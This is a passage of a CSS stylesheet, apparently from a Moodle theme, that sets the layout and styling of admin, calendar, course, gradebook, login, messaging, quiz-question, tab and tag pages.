{ margin-top: 0; } #admin-roles-explain #chooseusersubmit { margin: 1em 0 0; text-align: center; } #admin-roles-usersroles .contextname { margin: 0.5em 0 0; } #admin-roles-usersroles p { margin: 0; } table.rolecap { margin-left: auto; margin-right: auto; } .capabilitysearchui { text-align: left; margin-left: auto; margin-right: auto; } table.rolecap .hiddenrow { display: none; } tr.rolecap th { text-align: left; font-weight: normal; } table.rolecap .inherit, table.rolecap .allow, table.rolecap .prevent, table.rolecap .prohibit { text-align:center; } table.rolecap label { display: block; width: 100%; min-height: 2.5em; } .rolecap .cap-name, .rolecap .note { display: block; padding: 0 0.5em; } #admin-roles-override .cell.c1, #admin-roles-assign .cell.c3, #admin-roles-assign .cell.c1 { padding-top: 0.75em; } #admin-roles-override .overridenotice, #admin-roles-define .definenotice { margin: 1em 10% 2em; text-align: left; } table.explainpermissions { border: 1px solid black; } table.explainpermissions .cell { border-bottom: none; } table.explainpermissions th.header, table.explainpermissions th.cell, table.explainpermissions td.cell { border-left: 1px solid black; border-right: 1px solid black; vertical-align: middle; } table.explainpermissions .newcontext .cell, table.explainpermissions .row2 th.header { border-top: 1px solid black; } table.explainpermissions .cell.inherit, table.explainpermissions .cell.noroles { color: gray; } table.explainpermissions th.assignment { text-align: left; padding-left: 0.5em; } table.explainpermissions .cell.prohibit { font-weight: bold; } table.explainpermissions .cell { padding: 0.2em 0.5em; text-align: center; } #admin-lang .generalbox { text-align:center; margin:auto; border-width: 1px; border-style: solid; } #admin-langimport .generalbox { text-align:center; margin:auto; border-width: 1px; border-style: solid; } #admin-langimport .generalbox table { text-align:center; margin:auto; } #admin-index .adminerror, #admin-index .adminwarning { text-align:center; border-width: 1px; border-style: solid; margin:20px; } #admin-index .adminerror .singlebutton, #admin-index .adminwarning .singlebutton, #admin-index #layout-table .singlebutton { text-align:center; margin:20px; } #admin-user-user_bulk #users .fgroup { white-space: nowrap; } .plugincompattable caption { text-align: center; width: 100%; font-weight: bold; font-size: 130%; } .plugincheckwrapper td{ border: 1px #bbbbbb solid; } .plugincheckwrapper{ width: 100%; } /* Admin settings */ #adminsettings div.form-item { clear: both; margin: 1em 0 2em 0; } #adminsettings .form-label { display: block; float: left; width: 12.5em; text-align: right; } #adminsettings .form-shortname { display: block; } #adminsettings .form-setting { display: block; margin-left: 13em; text-align: left; } #adminsettings .form-defaultinfo { display: inline; } #adminsettings .defaultsnext { margin-right: 0.5em; display: inline; } #adminsettings .form-description { display: block; margin: 0.5em 0 0em 13em; text-align: left; } #adminsettings div.form-password div.unmask { display: inline; } #adminsettings fieldset { margin-top: 1em; padding: 1em 0.5em; } #adminsettings legend { display: none; } #adminsettings fieldset.error { margin: 0.2em 0 0.5em 0; padding: 0.5em 0 0 0; } #adminsettings fieldset.error legend { display: block; } #adminsettings .form-multicheckbox li { list-style: none; } #adminsettings .form-multicheckbox ul { padding:0; margin:0; } #adminsettings .form-item .pathok, #adminsettings .form-item .patherror { margin-left: 0.5em; } #adminsettings .form-htmlarea { width: 640px; display:inline; } #adminsettings .form-htmlarea .htmlarea { width: 640px; display:block; } .environmentbox { margin-top: 1em; } .environmenttable .cell { padding: 0.15em 0.5em; } .form-buttons { margin: 10px 0 0 13em; } .adminsearchform { padding-top:10px; } .block_admin_tree .admintree { text-align:left; } .block_admin_tree .admintree .depth1 { padding-left: 16px; } .block_admin_tree .admintree .depth2 { padding-left: 32px; } .block_admin_tree .admintree .depth3 { padding-left: 48px; } .block_admin_tree .admintree .depth4 { padding-left: 64px; } #admin-lang .translator { border-width: 1px; border-style: solid; } #adminsettings #admin-calendar_weekend table { width: 100%; } #adminsettings #admin-calendar_weekend table td { text-align: center; } #adminsettings #admin-calendar_weekend table td label { width: 100%; text-align: center; float: none; } #trustedhosts .generaltable { margin-left: auto; margin-right: auto; width: 500px; } #trustedhosts .standard { width: auto; } #mnetconfig table { margin-left: auto; margin-right: auto; } #admin-report-courseoverview-index .graph, #course-report-stats-index .graph, #admin-report-stats-index .graph { text-align: center; margin-bottom: 1em; } #admin-uploaduser table#uuresults { margin-bottom: 2em; } #admin-uploaduser table#uupreview, #admin-uploaduser table#uuresults td.cell { padding-left: 3px; padding-right: 3px; } /*** *** Blocks ***/ /*Accessibility: Skip block link, for keyboard-only users. */ a.skip-block, a.skip { position: absolute; top: -1000em; font-size: 0.85em; } a.skip-block:focus, a.skip-block:active, a.skip:focus, a.skip:active { position: static; display: block; } .skip-block-to, #maincontent { display: block; height: 1px; overflow: hidden; } .sideblock { margin-bottom:1em; width: 100%; } .sideblock .header, .sideblock h2.header { text-align: left; margin:0; padding:4px; padding-top:0; border-width: 1px; border-style: solid; border-bottom: none; } .sideblock h2 { margin:0; padding:0; } .sideblock .header .hide-show-image { float:right; height:11px; width:11px; margin-top:0.25em; } .sideblock .header .commands { margin-top: 0.3em; clear: both; height: 16px; } .sideblock .header .commands a { margin: 0px 2px; } .block-region .hidden .header { border-bottom-width: 1px; border-bottom-style: solid; } #region-side-pre, #region-side-post { width: 12em; } #content { width: auto; } .block-region .hidden .content { display: none; } .block-region .invisible { opacity: 0.5; filter: alpha(opacity=0.5); } .sideblock .header .icon.hide, .sideblock .header .icon.edit { margin-right: 6px; } .blockannotation { font-size:0.75em; margin: -1em 0 1em; } .blockmovetarget { display: block; height: 1em; margin-bottom: 1em; border-width: 2px; border-style: dashed; } .sideblock.beingmoved { border-width: 2px; border-style: dashed; } .sideblock .content { padding: 4px; border-width: 1px; border-style: solid; } .sideblock .content h3, .sideblock .content h2 { text-align: left; } .sideblock .content h2 { margin:1.5em 0 0; padding:0; } .sideblock .content .head { margin-top: 10px; } .sideblock .content hr { height:1px; margin-top:4px; margin-bottom:4px; border:none; border-top:1px solid; } .sideblock div.column { margin:0px; margin-right:4px; padding:0px; } .sideblock div.column.c0 { float: left; } .sideblock div.column.c1 { display: inline; } .sideblock .content .c0 img.icon { margin:0px; } .sideblock .content .list, .unlist, .inline-list { list-style:none; padding:0; margin:0; } .sideblock .content .list { width: 100%; } .sideblock .content .list li { clear: left; } .sideblock .content .inline-list li, .inline-list li { display: inline; } .sideblock .content ul.list li.listentry { clear:both; } .sideblock .content div.info { text-align:center; } .sideblock .footer { margin-bottom: 4px; text-align:center; clear:both; } .sideblock img.userpicture { width:16px; height:16px; margin-right:4px; } .blockconfigtable { margin-top: 0; margin-right: auto; margin-left: auto; } .blockconfigtable td.label { text-align: right; width: 50%; } .blockconfigtable td.value { text-align: left; width: 50%; } .blockconfigtable td.submit { text-align: center; } .blockconfiginstancecontent .tabs { margin-bottom: 0px; margin-left: auto; margin-right: auto; } .block_adminblock { width: 180px; } .block_messages .content { text-align:left; font-size:0.75em; padding-top:5px; } .block_recent_activitysideblock .h3 { padding-top:5px; } .block_online_users .listentry div.user, .block_messages .listentry div.user { float:left; } .block_online_users .listentry div.message, .block_messages .listentry div.message { float:right; } .block_course_list .footer { margin-top: 5px; } #rssfeeds { margin-left: auto; margin-right: auto; } #block_rss { text-align: center; } .block_search_forums .invisiblefieldset { display: block; } .block_tag_youtube .youtube-thumb { padding: 3px; padding-bottom: 0.5em; display: block; float: left; } .block_tag_youtube .yt-video-entry li { clear: left; } .block_tag_flickr .flickr-photos { padding:3px; } /*** *** Blogs ***/ .addbloglink { text-align: center; } .blogpost .audience { text-align: right; } .blogpost .tags { margin-top: 15px; } /*** *** Calendar ***/ #calendar { width: 100%; border-spacing: 5px; border-collapse: separate; } #calendar h2, #calendar h3 { text-align: center; } #calendar .sideblock h2 { text-align: left; } #calendar .maincalendar, #calendar .sidecalendar { vertical-align: top; border: 1px solid; padding: 0px; } #calendar .maincalendar { height: 100%; } #calendar .maincalendar .heightcontainer { height: 100%; position: relative; } #calendar .maincalendar .bottom { width: 100%; text-align: center; padding:5px 0 0; } #calendar .sidecalendar { width: 25%; } #calendar .maincalendar table.calendarmonth { border-collapse: separate; margin: 0px auto; width: 98%; } #calendar .maincalendar table.calendarmonth th { padding:10px; border-bottom:2px solid; } #calendar .maincalendar table.calendarmonth td { height: 5em; padding-left: 4px; padding-top: 4px; line-height:1.2em; } #calendar .maincalendar table.calendarmonth td, table.minicalendar td, table.minicalendar th { width:14%; vertical-align:top; } table.minicalendar td { text-align: center; } #calendar .maincalendar table.calendarmonth td table td { height: auto; } #calendar .maincalendar div.header { padding: 5px; } #calendar .maincalendar .buttons { float: right; } #calendar .maincalendar .filters table, #calendar .sidecalendar .filters table, .sideblock.block_calendar_month .filters table { border-collapse:separate; border-spacing: 2px; padding: 2px; width: 100%; } #calendar .maincalendar .filters { padding: 0px 10px; } #calendar .sidecalendar .filters { padding: 5px; } #calendar .maincalendar .controls { clear:both; padding:10px; } #calendar .maincalendar table.calendarmonth ul.events-new, #calendar .maincalendar table.calendarmonth ul.events-underway { padding:0px; margin:0px; list-style-type:none; } #calendar .maincalendar table.calendarmonth ul li { margin-top: 4px; } .minicalendarblock { padding: 0px 4px; } table.minicalendar { width: 100%; margin: 10px auto; padding:2px; border-width:1px; border-style:solid; border-collapse:separate; border-spacing:1px !important; } table.minicalendar th { padding: 0px 2px; } #calendar .maincalendar .eventlist { padding: 10px; } #calendar .maincalendar .eventlist .topic { padding: 5px; border-style:solid; border-width: 0px; border-bottom-color: #EEEEEE; border-bottom-width: 1px; } #calendar .maincalendar .eventlist .event { width:100%; margin-bottom:10px; border-spacing:0px; border-collapse:separate; border-width:1px; border-style:solid; } #calendar .maincalendar .eventlist .event .name { float:left; } #calendar .maincalendar .eventlist .event .course { float:left; clear:left; } #calendar .maincalendar .eventlist .event .date { float:right; } #calendar .maincalendar .eventlist .event .description .commands { width:100%; } #calendar .maincalendar .eventlist .event .description { padding:5px; } #calendar .maincalendar .eventlist .event .picture { padding:8px; } #calendar .maincalendar .eventlist .event .side { width:32px; } #calendar #selecteventtype table { margin:auto; } #calendar .event_global, #calendar .event_course, #calendar .event_group, #calendar .event_user, .minicalendar .event_global, .minicalendar .event_course, .minicalendar .event_group, .minicalendar .event_user { border:2px solid !important; } #calendar .duration_global, #calendar .duration_course, #calendar .duration_group, #calendar .duration_user, .minicalendar .duration_global, .minicalendar .duration_course, .minicalendar .duration_group, .minicalendar .duration_user { border-top:2px solid !important; border-bottom:2px solid !important; } #calendar .today, .minicalendar .today { border:2px solid; } #calendar .nottoday, .minicalendar .today { border:1px solid; } .cal_popup_bg { padding:0px; margin:0px; border:1px solid; } .cal_popup_close { margin-right:5px; } .cal_popup_caption { border-width:0px 0px 1px 0px; border-style:solid; padding-bottom:2px; } /*Accessibility: controls now div and span, 20:58:20% or 12:74:12% */ .calendar-controls .previous, .calendar-controls .next, .calendar-controls .current { display: block; float: left; width: 12%; } .calendar-controls .previous { text-align: left; } .calendar-controls .current { text-align: center; width: 76%; } .calendar-controls .next { text-align: right; } #calendar .maincalendar .calendar-controls .previous, #calendar .maincalendar .calendar-controls .next { width: 30%; } #calendar .maincalendar .calendar-controls .current { width: 39.95%; } #calendar .indent { padding-left: 20px; } #calendar td.sidecalendar { border-width:0px; } #calendar td.sidecalendar .minicalendartop { padding-top:10px; } .sideblock .content h3.eventskey { margin-top:0.5em; margin-bottom:0; margin-left:0.5em; } /*** *** Course ***/ .activitydate, .activityhead { text-align:center; } .course-view .section td { vertical-align:top; } .course-view .section td.content { padding:5px; border-style:solid; border-width:1px; border-left:0px; border-right:0px; } .course-view .section td.side { padding:5px; border-style:solid; border-width:1px; } .course-view .section td.left { border-right:0px; text-align:center; width: 1.5em; } .course-view .section td.right { border-left:0px; text-align:center; width: 1.5em; } .course-view .current .side { } .course-view .section .spacer { height:0.5em; } .course-view .section .weekdates { } .course-view li.activity { margin-right:20px; /* Space allowed for completion icons if enabled */ position:relative; } .dir-rtl.course-view li.activity { margin-right:0px; margin-left:20px; } .course-view li.activity form.togglecompletion, .course-view li.activity span.autocompletion { display:inline; position:absolute; right:-20px; top:0; z-index:10; padding:0.2em 0; } .dir-rtl.course-view li.activity form.togglecompletion, .dir-rtl.course-view li.activity span.autocompletion { right:auto; left:-20px; } .course-view li.activity form.togglecompletion div { display:inline; } .course-view .completion-saved-display { position:absolute; top:0; left:0; border:1px solid black; padding: 1px 2px; background:white; font-size:0.85em; } .course-view .completionprogress { font-size:0.80em; float:right; padding:8px 26px 5px 5px; ; } .course-view .completionprogress img.iconhelp { vertical-align:top; } .course-view ul.section, #site-index ul.section { margin: 0; padding: 0; list-style: none; } .section_add_menus { text-align:right; } .section_add_menus .horizontal div { display:inline; } .weeks-format, .topics-format { margin-top: 8px; } /*.course-view ul.section li.activity ul li, #site-index ul.section li.activity ul li { list-style: disc; }*/ /*Accessibility: No-tables course format. */ .course-view ul.weeks , .course-view ul.topics{ margin: 0; padding: 0; list-style: none; } /* Window-width: 800 pixels. IE doesn't support, see inline IE conditional comment. */ .weeks-format, .topics-format { min-width: 763px; } .topics-format .block_adminblock select, .weeks-format .block_calendar_month .minicalendar, .topics-format .block_calendar_month .minicalendar { width: 100%; padding: 0; } .weeks-format .block_calendar_month .minicalendar th, .topics-format .block_calendar_month .minicalendar th, .weeks-format .block_calendar_month .minicalendar td, .topics-format .block_calendar_month .minicalendar td { padding: 0.1em 0 0.1em 1px; } .weeks li.section , .topics li.section { margin-bottom: 0.5em; border-style:solid; border-width:1px; } .weeks .content, .topics .content { padding: 5px; margin: 0 1.7em 0 1.7em; } .weeks .right, .weeks .left, .topics .right, .topics .left { width: 1.6em; padding: 5px 0; text-align: center; } .weeks .left, .topics .left { float: left; } .weeks .right, .topics .right { float: right; } .section .activity img.activityicon { vertical-align:middle; height:16px; width:16px; } .section img.movetarget { height:16px; width:80px; } body.course-view .unread { margin-left: 3em; } body.course-view .sideblock.drag .header { cursor: move; } body#course-enrol .generalbox { margin-top: 20px; } body#course-enrol .coursebox { margin-top: 20px; } body#course-user .graph { text-align: center; } body#course-user .section, body#course-user .content { margin-left: 30px; margin-right: 30px; } body#course-user .section { border-width:1px; border-style:solid; padding:10px; margin-bottom: 20px; } body#course-user .section h2 { margin-top: 0; } .headingblock, h2.headingblock { border-width:1px; border-style:solid; padding:5px; margin:0; } #site-index .subscribelink, .course-view .subscribelink { text-align:right; } body#site-index .headingblock, body.course-view .headingblock { margin-bottom: 9px; } body#course-category .courseboxes, body#course-index .courseboxes { padding:20px; } body#admin-course-category .rolelink { text-align:right; padding:10px; } body#admin-course-category .addcategory { text-align: center; padding: 10px; } body#admin-course-index .buttons .singlebutton, body#admin-course-category .buttons .singlebutton { display: inline; } body#admin-course-index .buttons, body#admin-course-category .buttons { text-align: center; margin-bottom: 15px; } body#admin-course-index .editcourse { margin-left:auto; margin-right:auto; margin-top:20px; margin-bottom:20px; } body#admin-course-index .editcourse th, body#admin-course-index .editcourse td { padding-left:10px; padding-right:10px; } body#admin-course-index .editcourse .count { text-align:right; } body#admin-course-index .singlebutton, body#admin-course-index .addcategory { text-align: center; } body#course-info .generalbox.icons { text-align: center; } body#course-info .generalbox.info { margin-left:auto; margin-right:auto; } .coursebox { width: 100%; /* float:left; */ margin-bottom: 15px; border-width:1px; border-style:solid; } .coursebox .summary { float: right; text-align:left; width: 48%; padding:5px; } .coursebox .info { float: left; text-align:left; width: 48%; padding:5px; } #my-index .coursebox .info { float: none; } #my-index .name { margin-left: 5px; } #course-pending .pendingcourserequests { margin-bottom: 1em; } #course-pending .pendingcourserequests .singlebutton { display: inline; } #course-pending .pendingcourserequests .cell { padding: 0 5px; } #course-pending .pendingcourserequests .cell.c6 { white-space: nowrap; } #course-pending .singlebutton { text-align: center; } .categorylist { width: 90%; margin-left: auto; margin-right: auto; } .categorylist .category.image { width: 20px; } .categorylist .category.number { text-align: right; } .categorylist .category.indentation { width: 1px; } .categoryboxcontent { border-width:1px; border-style:solid; } .categorypicker { text-align:center; padding-bottom:10px; } #coursesearch, #coursesearch2 { margin-top: 1em; text-align:center; } .addcoursebutton { text-align:center; } .coursebox .cost { padding-top: 20px; } .coursebox ul.teachers li { list-style-type:none; padding:0; margin:0; } #course-category #renameform { text-align:center; } #course-category #themeform { text-align: center; } #course-category .singlebutton { text-align:center; } #course-category #coursesearch { text-align:center; } #course-report #content { padding-top:15px; padding-bottom:15px; } #course-report p { text-align:center; } #course-report .logselectform, #course-report .participationselectform, #course-report-log-index .logselectform, #course-report-participation-index .participationselectform { margin-left:auto; margin-right:auto; text-align:center; margin-top:10px; margin-bottom:10px; } #course-report .participationselectform label, #course-report-participation-index .participationselectform label { margin-left:15px; margin-right:5px; } #course-report-log-index .info, #course-report-log-indexlive .info { margin-left:auto; margin-right:auto; text-align:center; margin:10px; } .course-report-outline td.numviews { text-align:right; } .course-report-outline div.loginfo { text-align:center; margin: 1em; } #content .coursebox .summary .category { text-align:right; } #course-editsection .singlebutton { text-align:center; } .jumpmenu {text-align:center} /*** *** Group ***/ body#group-index #groupeditform { text-align: center; } #add, #remove{ text-align:center; } /*** *** Doc ***/ body#doc-contents h1 { margin: 1em 0px 0px 0px; } body#doc-contents ul { list-style-type: none; margin: 0; padding: 0; width: 90%; } /*** *** Grades ***/ /* scales edit */ .grade-edit-scale .buttons { margin: 20px; text-align:center; } .grade-edit-scale .buttons .singlebutton { display: inline; padding: 5px; } /* outcomes edit */ .grade-edit-outcome .buttons { margin: 20px; text-align:center; } .grade-edit-outcome .buttons .singlebutton { display: inline; padding: 5px; } div.allcoursegrades { width: 100%; text-align: right; padding: 4px 0px 5px 0px; } .importoutcomenofile .singlebutton { text-align: center; margin-top: 5px; } /* gradebook edit tree */ .grade-edit-tree .gradetreebox { width:70%; margin-left:auto; margin-right:auto; margin-top:10px; padding-bottom:15px; } .grade-edit-tree .buttons { margin: 20px; text-align:center; } .grade-edit-tree .idnumber { margin-left: 15px; } .grade-edit-tree .buttons .singlebutton { display: inline; padding: 5px; } .grade-edit-tree .movetarget { position: relative; width: 80px; height: 16px; } .grade-edit-tree ul#grade_tree { width: auto; } .grade-edit-tree ul#grade_tree li { list-style: none; } .grade-edit-tree ul#grade_tree li.category { margin-bottom: 6px; } .grade-edit-tree .iconsmall { margin-left: 4px; } #grade-report-toggles { text-align: center; } .gradeexportlink { padding: 2em; text-align: center; margin-left: auto; margin-right: auto; } #grade-aggregation-help dt { margin-top: 15px; } #grade-aggregation-help dd.example { margin-top: 7px; } #grade-aggregation-help code { display: block; margin-top: 7px; } /*** *** Login ***/ .loginbox { margin-top:15px; margin-bottom:15px; border:1px solid; width:50%; margin-left:25%; overflow:hidden; } .loginbox form { margin:0px; padding:0px; } .loginbox.twocolumns { width:90%; margin-left:5%; /* background: #faa; */ } .loginbox h2, .loginbox .subcontent { margin:5px; padding:10px; text-align:center; } .loginbox .loginpanel .subcontent { text-align:center; } .loginbox .loginpanel .desc { margin:0px; padding:0px; margin-bottom:5px; } .loginbox .signuppanel .subcontent { text-align:left; } .loginbox .loginsub { margin-left:0%; margin-right:0%; } .loginbox .guestsub, .loginbox .forgotsub { border-top:1px solid; margin-left:12%; margin-right:12%; margin-bottom:5px; } .loginbox .loginform { margin-top:1em; text-align:left; } .loginbox .loginform .form-label { float:left; text-align:right; width:40%; } .loginbox .loginform .form-input { float:right; width:59%; } .loginbox .loginform .form-input input { width: 6em; } .loginbox .signupform { margin-top:1em; text-align:center; } .loginbox.twocolumns .loginpanel { float:left; width:49.5%; border-right: 1px solid; margin-bottom:-2000px; padding-bottom:2000px; /* background: #afa; */ } .loginbox.twocolumns .signuppanel { float:right; width:50%; margin-bottom:-2000px; padding-bottom:2000px; } /*** *** Message ***/ #message-user .userpicture, #message-history .userpicture { width: 100px; height: 100px; } .message-discussion-noframes #userinfo .userpicture { float:left; } .message-discussion-noframes #userinfo .name h1 { margin:0px; } .message-discussion-noframes #userinfo .name { text-align:center; margin-left:60px; } .message-discussion-noframes #userinfo .commands { text-align:left; margin-left:60px; } .message-discussion-noframes #userinfo .commands ul { margin:0px; padding:0px; list-style-type:none; } .message-discussion-noframes #userinfo .commands ul li { display:inline; padding-right:16px; } .message-discussion-noframes #send { padding-top:10px; clear:both; } .message-discussion-noframes #send h1 { margin:0px; } .message-discussion-noframes #messages { padding-top:10px; } .message-discussion-noframes #messages ul.messagelist { margin:0px; padding:0px; } .message-discussion-noframes #send h1 { margin:0px; } .message .noframesjslink { margin-top:20px; } .message .link { vertical-align:middle; } table.message .searchresults td { padding:5px; border-width:1px; border-style:solid; border-collapse:collapse; border-spacing:0px; } .message .summary .link { text-align:right; } .message .heading { text-align:center; } .message .note { text-align:center; padding:10px; } #message-user .commands span { margin-left:10px; margin-right:10px; } body#message-messages { padding:10px; } body#message-send .notifysuccess { padding:1px; } body#message-send td.fixeditor { text-align:center; } body#message-edit fieldset { padding: 20px; } body#message-edit th { padding-top: 10px; padding-left: 20px; } body.message .messagejsautorefresh { display:none; } body.message .messagejsmanualrefresh { display:block; } body.jsenabled .messagejsautorefresh { display:block; } body.jsenabled .messagejsmanualrefresh { display:none; } /*** *** Notes ***/ .notepost { margin-bottom: 1em; background-color: #EEE; } .sitenotepost { } .coursenotepost { } .draftnotepost { } .ownnotepost .info { } .notepost .header { background: #DDD; padding: 5px; } .notepost .user { font-weight: bolder; } .notepost .userpicture { float: left; margin-right: 5px; } .notepost .info { font-size: smaller; } .notepost .content { clear: both; } .notepost .footer { clear: both; } body.notes .generalbox { margin-left:auto; margin-right:auto; width:90%; } body.notes .notesgroup { margin-left:20px; } /*** *** MyMoodle ***/ .my .coursebox .overview .info { margin-left:20px; } .my .coursebox .overview { margin-bottom:10px; } /*** *** Question ***/ .questionbank h2 { margin-top: 0; } .questioncategories h3 { margin-top: 0; } #chooseqtypebox { margin-top: 1em; } #chooseqtype h3 { margin: 0 0 0.3em; } #chooseqtype .instruction { display: none; } #chooseqtype .fakeqtypes { border-top: 1px solid silver; } #chooseqtype .qtypeoption { margin-bottom: 0.5em; } #chooseqtype label { display: block; } #chooseqtype .qtypename img { padding: 0 0.3em; } #chooseqtype .qtypesummary { display: block; margin: 0 2em; } #chooseqtype .submitbuttons { margin: 0.7em 0; text-align: center; } #qtypechoicecontainer { display: none; } body.jsenabled #qtypechoicecontainer { display: block; } #qtypechoicecontainer #chooseqtype { width: 30em; } #qtypechoicecontainer #chooseqtypehead h3 { margin: 0; } #qtypechoicecontainer #chooseqtype .qtypes { position: relative; border-bottom: 1px solid grey; padding: 0.24em 0; } #qtypechoicecontainer #chooseqtype .qtypeoption { margin-bottom: 0; } #qtypechoicecontainer #chooseqtype .instruction, #qtypechoicecontainer #chooseqtype .qtypesummary { display: none; position: absolute; top: 0px; right: 0px; bottom: 0px; left: 60%; margin: 0; border-left: 1px solid grey; padding: 0.3em 0.5em; } #qtypechoicecontainer #chooseqtype .instruction, #qtypechoicecontainer #chooseqtype .selected .qtypesummary { display: block; } .que { text-align: left; margin: 0 auto 1.8em auto; border: 1px solid; } .que .info { float: left; margin: 0.5em 0; width: 11.9%; } .que .info h2 { margin: 0 0 0 0.64em; } .que .info div { margin-left: 1em; } .que .info .questionflag { margin-top: 1em; margin-right: 1em; text-align: center; } .que .content { float: left; margin: 0.5em 0; width: 88%; } .que.description .info { margin: 0.5em 0 0.5em 0.2em; width: 1em; } .que.description .content, .que.description .generalfeedback { margin-left: 1.2em; margin-bottom: 0.5em; float: none; width: auto; } .que.description .qtext { margin-bottom: 0; } .que .qtext { margin-bottom: 1.5em; } .que .ablock { margin: 0.7em 0 0.3em 0; } .que .prompt { float: left; width: 15%; height: 2em; padding-top: 0.3em; } .que .control { width: 5%; } .que .answer { float: left; width: 83%; margin-bottom: 0.5em; } .que .submit { position: relative; clear: both; float: left; } /* MSIE Hack */ * html .que .submit { float: none; } .multianswer .submit { margin-top: 1em; } .que .feedback { clear: both; padding: 0 0 0.3em 0.3em; margin-bottom: 0.5em; border: 1px solid; } .multichoice td.feedback { width: auto; vertical-align: top; padding-top: 0.3em; border-style: none; } .essay .feedback { border-style: none; } .multichoice .text { width: auto; } .calculated .answer, .numerical .answer, .shortanswer .answer { padding: 0.3em; width: auto; } .calculated .answer input, .numerical .answer input, .shortanswer .answer input { width: 99%; } .truefalse .answer span { float: left; clear: left; padding: 0.3em; width: 100%; } .que .grading, .que .comment, .que .commentlink, .que .generalfeedback, .que .history { margin-top: 0.5em; } .que .grade { margin-top: 0.5em; } .importerror { margin-top: 10px; border-bottom: 1px solid #555; } #mod-quiz-comment #manualgradingform, #mod-quiz-report #manualgradingform { width: 100%; } #mod-quiz-report #manualgradingform .que { margin-bottom: 0.7em; } .mform .que.comment .fitemtitle { width: 20%; } /*** *** Completion progress report ***/ #course-report-progress-index th, #course-report-progress-index td { padding:2px 4px; font-weight:normal; border-right: 1px solid #EEE; } .completion-expired { background:#fdd; } .completion-expected { font-size:0.75em; } .completion-sortchoice { font-size:0.75em; vertical-align:bottom; } .completion-progresscell { text-align:right; } .completion-expired .completion-expected { font-weight:bold; } #course-report-progress-index .progress-actions { text-align:center; } #course-report-progress-index .completion_pagingbar { margin:1em 0; text-align:center; } #course-report-progress-index .completion_prev { display:inline; margin-right:2em; } #course-report-progress-index .completion_pagingbar p { display:inline; margin:0; } #course-report-progress-index .completion_next { display:inline; margin-left:2em; } /*** *** Logs ***/ .logtable { margin-left:auto; margin-right:auto; } .logtable td, .logtable th { padding-left: 10px; padding-right: 10px; } .logtable th { text-align:left; } #course-user .info { margin-left:auto; margin-right:auto; text-align:center; margin:10px; } /*** *** Tabs ***/ /*globalnav*/ .tabtree { position:relative; } .tabrow0 { text-align: center; width:100%; margin:0; margin-top: 10px; padding:0 0 1.75em 0; list-style:none; line-height:1.8em; font-size: 84%; } .tabrow0 li { display: inline; margin: 0 -4px 0 0; padding: 0; } .tabrow0 a span { padding: 10px 14px 0.35em 0; background: transparent url(pix/tab/right.gif) no-repeat right top; } .tabrow1 li a span { background: none !important; } .tabrow0 a { text-decoration: none; background: transparent url(pix/tab/left.gif) no-repeat left top; margin: 0 -1px 0 0; padding: 10px 0 0.35em 13px; } .tabrow0 a:link:hover, .tabrow0 a:visited:hover { background-image: url(pix/tab/left_hover.gif); } .tabrow0 .here a:link:hover, .tabrow0 .here a:visited:hover { background-image: url(pix/tab/left.gif); } .tabrow0 a:link:hover span, .tabrow0 a:visited:hover span { background-image: url(pix/tab/right_hover.gif); } .tabrow0 .here a:link:hover span, .tabrow0 .here a:visited:hover span { background-image: url(pix/tab/right.gif); } .tabrow0 .here a { color:#444; } .tabrow0 .here a:link, .tabrow0 .here a:visited, .tabrow0 .here a.nolink { position:relative; z-index:102; } /*subnav*/ .tabrow0 .empty { height: 1px; overflow: hidden; padding: 0; } .tabrow0 div, .tabrow0 ul { position: absolute; left: 0; top: 1.95em; width: 100%; margin: 0; padding: 0.25em 0; list-style: none; border-top: 1px solid #aaa; line-height: normal; background: transparent url(pix/tab/tabrow1.gif) repeat-x center left; font-size: 90%; } .tabrow0 ul li { display:inline; margin-top:1px; background-image: none; } .tabrow0 ul a { background-image: none; color:#00c; margin:0; padding:0 1em; border:0 } .tabrow0 ul a span { padding: 0; background-image: none; } .tabrow0 ul .last span, .tabrow0 ul li a:hover, .tabrow0 ul li a:hover span, .tabrow0 ul .here a:hover, .tabrow0 ul .here a:hover span { background-image: none !important; } .tabrow0 ul div { display: none; } ul.tabrow1 li a, ul.tabrow1 li a:link, ul.tabrow1 li a:visited { color:#00c; font-size: 110%; } ul.tabrow1 li.here.selected a { color:#444; } /*** *** Tags ***/ h2.tag-heading { text-align:center; margin-left:auto; margin-right:auto; display:block; width:95%; padding: 5px 5px 5px 5px; } div#tag-description, div#tag-blogs { width:95%; padding: 5px 5px 5px 5px; margin-left:auto; margin-right:auto; display:block; } body#tag-index .moreblogs { text-align:center; } div#tag-management-box { margin-bottom:10px; text-align:center; line-height:20px; display:block; font-size:12px; } div#tag-user-table { padding:3px; width:95%; clear: both; margin-left:auto; margin-right:auto; display:block; } body.tag .managelink { text-align:right; padding:10px; } /* small css hack for firefox*/ div#tag-user-table:after{ content:"."; display:block; clear:both; visibility:hidden; height:0; overflow:hidden; } /* end hack*/ div.user-box { margin-left:8px; margin-right:8px; margin-top:8px; margin-bottom:8px; width:115px; height:160px; text-align:center; display:block; float:left; clear: none; } img.user-image { border:0px; height:100px; width:100px; } div#small-tag-cloud-box { width:300px; margin-left:auto; margin-right:auto; margin-bottom:0px; margin-top:0px; } div#big-tag-cloud-box { width:600px; margin-left:auto; margin-right:auto; margin-bottom:0px; margin-top:0px; display:block; float:none; } ul#tag-cloud-list { list-style:none; padding:5px; margin:0px; list-style-type:none; } ul#tag-cloud-list li { margin:0px; display:inline; } /* search start*/ div#tag-search-box { text-align:center; margin-left:auto; margin-right:auto; margin-top:10px; margin-bottom:10px; } div#tag-search-results-container { padding:0px; width:100%; } ul#tag-search-results { padding:0px; margin-left:20%; margin-right:20%; margin-top:15px; margin-bottom:0px; float:left; width:60%; display:block; list-style:none; } ul#tag-search-results li{ width:30%; float:left; padding-left:1%; text-align:left; line-height:20px; padding-right:1%; } div#tags-management-links { text-align:right; display:block; font-size:12px; } /* search end*/ /* tag management start*/ span.flagged-tag { color:#FF0000; } span.flagged-tag a{ color:#FF0000; } table#tag-management-list { text-align:left; margin-left:auto; margin-right:auto; } table#tag-management-list tr td{ padding-left:4px; padding-right :4px; } .tag-management-form { text-align:center; } /* tag management end*/ /* autocomplete start*/ #relatedtags-autocomplete-container { margin-left:auto; margin-right:auto; min-height:4.6em; width:100%; } #relatedtags-autocomplete { position:relative; display:block; width:60%; margin-left:auto; margin-right:auto; } #relatedtags-autocomplete .yui-ac-content { position:absolute; width:420px; left:20%; border:1px solid #404040; background:#fff; overflow:hidden; z-index:9050; } #relatedtags-autocomplete .ysearchquery { position:absolute; right:10px; color:#808080; z-index:10; } #relatedtags-autocomplete .yui-ac-shadow { position:absolute; margin:.3em; width:100%; background:#a0a0a0; 